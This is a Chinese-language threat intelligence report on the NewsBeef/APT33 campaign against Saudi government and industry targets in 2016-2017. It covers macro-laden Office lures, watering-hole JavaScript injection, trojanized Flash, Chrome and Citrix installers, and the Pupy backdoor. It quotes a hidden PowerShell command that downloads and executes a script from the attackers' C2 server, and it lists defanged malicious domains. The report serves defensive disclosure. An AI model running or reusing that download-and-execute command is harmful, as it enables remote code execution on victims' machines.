前言

最近，美国网络司令部（USCYBERCOM）针对上传至VirusTotal的几个恶意文件进行了分析，这些可执行文件与APT33/NewsBeef APT组织在2016-2017年的恶意活动有所关联。为了保障客户的安全，我们对这些恶意软件和入侵活动进行了研究。同时，我们还向订阅APT情报报告的用户提供来自世界各地100多个APT的主要恶意活动及相关数据，其中也包含2016-2017年期间NewsBeef/APT33恶意活动。

我们在2017年1月提供的私人报告《NewsBeef运载“圣诞礼物”》中，说明了USCYBERCOM所分析的VirusTotal可执行对象，该报告重点分析了针对沙特阿拉伯目标的鱼叉式网络钓鱼和水坑攻击中所使用的策略的变化。USCYBERCOM上传的两个文件非常值得关注，这两个恶意文件首次出现在2016年12月和2017年1月：

MD5：d87663ce6a9fc0e8bc8180937b3566b9

位于：jquerycode-download[.]live/flashplayer23pp_xa_install.exe

jquerycode-download[.]live/chrome_update.exe

检测为：Exploit.Win32.Generic

Trojan-Downloader.Win32.Powdr.a

Trojan-Downloader.MSIL.Steamilik.zzo

MD5：9b1a06590b091d300781d8fbee180e75

位于：jquerycode-download[.]live/citrixreceiver.exe

jquerycode-download[.]live/citrixcertificate.exe

ntg-sa[.]com/downloads/citrix_certificate.exe

检测为：Exploit.Win32.Generic

Trojan-Downloader.PowerShell.Agent.ah

DangerousObject.Multi.Generic

我们对Cyber Command说明的恶意软件及其背景进行了深入了解，并在此处重新编写了报告。在2017年1月的报告中，同时展现了该恶意组织在2015和2016年与BeEF相关的恶意活动，同时涵盖了在2016年和2017年重新分析和推进的线索。需要注意的是，无论当前的调查工作取得了多大的成果，也不能保证已经掌握有关恶意活动者的全部信息，该恶意组织的活动存在一些重叠，并且在对其内部动态的分析过程中存在一些难以梳理的地方。

执行摘要

NewsBeef APT组织此前利用流行的社交网络平台，精心设计了一个长期的社会工程学方案。此前对NewsBeef APT的分析表明，该恶意组织专注于沙特阿拉伯（SA）和西方的目标，同时该组织缺乏先进的攻击性技术开发能力。

在之前的活动中，NewsBeef严重依赖于浏览器开发框架（BeEF）技术。但是，在2016年夏季，该恶意组织部署了一个新的工具集，其中包括支持宏的Office文档、PowerSploit和Pupy后门。最近的NewsBeef恶意活动中，将该工具集与钓鱼邮件共同利用，通过社交媒体或私人消息传递应用程序发送恶意链接，或者利用被攻陷的知名网站（部分网站属于沙特政府）发起水坑攻击。该恶意组织不断改变他们的战术，选择将恶意JavaScript注入到被攻陷网站上的策略，并且使用了命令和控制C2基础设施。

经过调查与分析，我们得出的结论如下：

1、NewsBeef恶意组织在一个主要针对沙特阿拉伯目标的活动中，部署了一个新的工具集；

2、BeEF似乎没有被部署为当前恶意活动的一部分；

3、攻击者攻陷政府或与基础设施相关的网站，并注入恶意JavaScript，从而对访问者进行地理定位，并将访问者重定向到攻击者控制的Web服务器上；

4、攻击者对JavaScript注入方法和混淆方法进行了改进，可能会延长服务器的持久性；

5、NewsBeef持续部署恶意Office宏文档，制作包含恶意代码的Flash安装程序和Chrome安装程序，使用PowerSploit和Pupy工具。

技术分析

NewsBeef恶意活动共分为两个主要的攻击媒介，分别是鱼叉式钓鱼和水坑攻击。该恶意组织的鱼叉式网络钓鱼组件使用恶意的、启用宏的Microsoft Office文档来运载PowerShell脚本。脚本将会在线下载一个经过恶意篡改的合法安装程序（例如：Flash、Citrix客户端、Chrome）。将安装程序下载到受害者的计算机后，将会运行PowerSploit脚本，随后下载并执行功能完备的Puby后门程序。

2016年12月25日，NewsBeef APT组织启用了一台服务器，用于托管一组新的Microsoft Office文档（维持恶意宏和PowerShell脚本），以支持其鱼叉式网络钓鱼恶意活动。该恶意组织借助电子邮件、社交网络和独立消息传递客户端将这些文档或链接发送给目标。

为了攻陷网站和服务器，该恶意组织首先识别出易受攻击的网站，并注入混淆后的JavaScript，将访问者重定向到NewsBeef控制的主机，用于追踪受害者并提供恶意内容。这些被攻陷的服务器包括沙特阿拉伯政府的服务器，以及与其目标相关的其他高价值组织的资产。

目标、社会工程、运载链

我们在研究过程中观察到的大部分NewsBeef的目标都位于沙特阿拉伯，其目标包括：

政府财政和行政组织

政府卫生组织

工程技术组织

一个与英国劳务相关的政府组织（被多次列为目标）

大多数目标都受到水坑攻击的影响，特别是被攻击的政府服务器。但是，卡巴斯基安全网络（KSN）记录中还包含受害者从Outlook Web客户端“outlook.live.com”单击的链接和通过Outlook桌面应用程序获取的附件。该恶意行为与之前NewsBeef的恶意活动一致，该恶意组织使用其他独立消息传递客户端来发送恶意链接。值得关注的是，NewsBeef使用托管服务提供商“Choopa, LLC, US”的服务来创建自己的服务器，这也是该恶意组织在2016年夏季用于攻击的托管服务提供商。

域名“ntg-sa[.]com”似乎是NewsBeef攻击者试图伪装成合法的沙特IT服务商“National Technology Group”（NTG）官网“ntg.com[.]sa”。在虚假的网站上提供的恶意文件如下所示：

NTG是一家合法的公司，为沙特政府组织、通信公司、国际金融集团和零售商提供IT服务和支持，由此也成为了攻击者的重点目标。对于威胁行为者来说，如果能伪装成IT服务提供商的身份，将会得到一个非常好的掩护身份。用户通常会对IT组织具有一定程度的信任，而攻击者恰好可以滥用用户的信任来推送软件（如果从其他来源提供服务，可能会显得非常可疑）。NTG的IT焦点和客户名单可能有助于NewsBeef提供启用恶意PowerShell的Office文档，以及恶意篡改后的安装程序。

2016年12月，攻击者伪装成NTG的身份提供了以下有效网址。其中，所有被恶意篡改的安装程序，都是IT支持服务过程中可能会提供的内容。

hxxps://ntg-sa[.]com/Downloads/flashplayer23pp_xa_install.exe

hxxps://ntg-sa[.]com/Downloads/Citrix_Certificate.exe

hxxps://ntg-sa[.]com/Downloads/Chrome_Update.exe

在实际场景中，经过恶意篡改的Flash Player、Citrix或Chrome安装程序将投放“install.bat”文件。该批处理文件运行以下PowerShell命令：

powershell.exe -w hidden -noni -nop -c “iex(New-Object

System.Net.WebClient).DownloadString(‘http://139.59.46[.]154:3485/eiloShaegae1′)

该命令将下载另一个PowerShell下载工具脚本“eiloShaegae1”。第二个PowerShell下载工具脚本负责下载Payload并运行，Payload是一个PowerSploit反射型PE注入脚本，来自于“hxxp://139.59.46[.]154:3485/IMo8oosieVai”。

该脚本负责维护并解码Base64字符串。这一Base64字符串是Puby后门DLL，在内存中加载并运行，不会存储到磁盘上。Pupy后门会通过obfs3与139.59.46[.1]54进行通信，向C2服务器发送收集到的系统数据，并检索命令。

在这里，攻击者选取了这种用于命令和控制（C2）通信的“The Threebfuscator”方式非常值得关注，因为它是用于屏蔽Tor通信的混淆协议。Obfs3的使用，可能表明攻击者了解其对出站连接监控的有效性。

在恶意活动期间，使用的另一个值得关注的欺骗性域名是“maps-modon[.]club”域名。域名“maps.modon.gov[.]sa”在2016年12月被入侵，“maps-modon[.]club”在2016年12月8日创建。该恶意域名与“ntg-sa[.]com”共享相同的IP地址（45.76.32[.]252）。尽管我们没有观察到该域名存放了任何恶意文档，但该域名很可能与ntg-sa[.]com提供了相同的文档。在伪装的NTG网站上托管的恶意Office文档文件名与典型的IT合同资源相关，表明该方案依赖于与人力资源和IT活动相关的有效社会工程学策略。

在其他案例中，攻击者伪装成律师事务所的身份（或其他相关服务提供商），将启用宏的Office附件通过邮件的方式发送到沙特的攻击目标。其伪装的律师事务所位于英国，是该恶意活动中除沙特阿拉伯以外的唯一国外地点。下面是Word文档的屏幕截图，该文档伪装成一份法律提案，其中包含恶意宏和PowerShell代码。

该恶意文档与恶意篡改的Flash播放器和Chrome安装程序具有相同的攻击链：

被攻陷的服务器和JavaScript注入

自2016年10月开始，NewsBeef接连攻陷一系列合法的服务器（如下所示），并进行JavaScript注入，从而将访问者重定向到hxxp://analytics-google[.]org:69/Check.aspx：

被攻陷的服务器全部位于沙特阿拉伯，包括以下行业的组织：

工业进程的能源服务

电信工程和实施服务

运输与物流

金属工程和制造业

信息技术服务

水泥和建筑材料

与之前NewsBeef的恶意活动相比，最近这些针对合法服务器的攻击活动表明，NewsBeef恶意运营者已经提高了他们的技术能力，特别是将JavaScript代码隐蔽地注入到正常网站服务中的能力。他们的注入和混淆技术能够使得每次在用户访问“水坑”站点时都提供相同的JavaScript，同时也能够增加在受感染网站上识别恶意JavaScript源的难度。

举例来说，在沙特政府的网站上，NewsBeef APT将加壳后的JavaScript放置在引用脚本的底部，该脚本包含在网站提供的每一个页面之中（加壳和脱壳的JavaScript代码如下所示）。JavaScript将强制访问Web浏览器以收集信息，并通过浏览器的POST请求将Web浏览器、浏览器版本、国家、IP地址信息发送到攻击者控制的服务器“jquerycodedownload[.]live/check.aspx”上。

攻击者之所以收集上述信息，可能是为了尝试将感染数量限制为特定目标子集，从而避免攻击者做无用功。尽管我们没有识别出来与“analytics-google[.]org/check.aspx”重定向相关的JavaScript注入代码，但它很可能也执行了类似的数据收集和渗透工作（通过POST方式）。这种技术与研究人员在此前NewsBeef水坑攻击中观察到的简单的.JPG信标相比有所改进。

被攻击者流量劫持最多的网站似乎是“scsb.gov[.]sa/portal/”，用户在访问该网站后将被重定向到恶意的“jquerycode-download[.]live”。对被攻陷网站的合法访问的重定向一直持续到2017年1月中旬。

下面展现了被攻陷网站的列表，以及与注入的JavaScript相关的恶意URL。需要注意的是，JavaScript源会根据每个被攻陷网站上其他引用的JavaScript源进行更改，因此难以跟踪每个站点的恶意脚本来源：

www.taqa.com[.]sa/Scroll-jquery.js

199099.gov[.]sa/_LAYOUTS/Yesser.NCC/js/jquery-1.7.2.min.js

除此之外，其他多个相关网站也遭到入侵和重定向。

Pupy后门

Pupy是一个开源的多平台、多功能后门，同时支持Windows、Linux、macOS、Android平台。该后门主要使用Python编写，并使用其他开源攻击工具的代码，例如PowerSploit、Mimikatz、laZagne等。Pupy可以生成多种格式的反向连接，或绑定多种格式的Payload：用于Windows 的PE可执行文件（x86或x64）、用于Linux的ELF二进制文件.so、反射型DLL（x86或x64）、纯Pyhton文件、PowerShell、APK和用于Windows的Rubber Ducky脚本。

NewsBeef部署的恶意DLL中包含Python代码、Python解释器、MSVC运行时库和加载Python解释器、运行Python代码、导出Python的一些函数的代码。配置字符串包含Base64编码后的Python代码（使用zlib加壳），其中包含传输配置和有关C2服务器地址的信息。

在启动时，Python代码会尝试从受害者的计算机中检索并使用SOCKS/HTTP代理设置。然后，Python代码尝试使用具有RSA+AES流量加密的TCP协议和使用Pupy源默认密钥的obfs3传输启动与C2服务器的反向连接（139.59.46[.]154:3543）。

在连接成功后，NewsBeef Pupy会发送关于受感染计算机的信息，并等待来自C2服务器的命令（采用模块的形式）。C2服务器可以发送带有Python代码和编译的Python C扩展的模块。后门的主要功能是在包（Python代码、编译的Python C扩展、编译的可执行文件）和模块（Python代码）中实现的。模块可以使用RPyC模块直接访问远程客户端上的Python对象。Python模块win32com、win32api、ctypes都用于与Win32 API进行交互。攻击者可以使用标准模块，也可以自行编写。上述所有模块都在内存中执行，Pupy进程可以使用相应的模块在进程之间实现迁移。

总结

在此前有关NewsBeef APT的分析中指出，该恶意组织依赖开源工具发起简单而有效的攻击。从历史上看，该恶意组织已经使用BeEF跟踪目标，并提供恶意Payload。然而，正如最近该APT组织的恶意活动所表明的那样，NewsBeef APT似乎已经将其入侵工具集从BeEF转移到支持宏的恶意Office文档、PowerSploit和Pupy。尽管该恶意组织的工具集发生了这样的转变，但该恶意组织仍然依赖于旧的基础设施，我们可以从该恶意组织再次使用了服务提供商Choopa和Atlantic.net托管的服务器来佐证这一点。

APT组织对于战术、技术和过程（TTP）的改进似乎得到了回报。最近一次恶意活动表明，该恶意组织能够有效攻陷更多的网站，其中包括有价值的、备受瞩目的沙特政府网站。然而，尽管技术上有了一些改进，但NewsBeef APT仍然依赖于社会工程学和开源工具，这些特征让我们能够更好地识别这一APT组织的恶意活动。

我们预测，NewsBeef对沙特阿拉伯的组织和个人以及欧盟目标的攻击可能会持续下去。此外，研究人员预计，随着该恶意组织的发展，其攻击目标可能将扩展到与沙特阿拉伯组织和个人开展业务或有所关联的其他组织。

考虑到该APT组织的攻击目标，我们建议沙特阿拉伯的安全团队、管理员和开发人员（特别是Web应用程序的管理员和开发人员）及时更新其基于WordPress、Joomla和Drupal的Web应用程序和插件，使用上述应用的资产会被该恶意组织重点扫描和利用。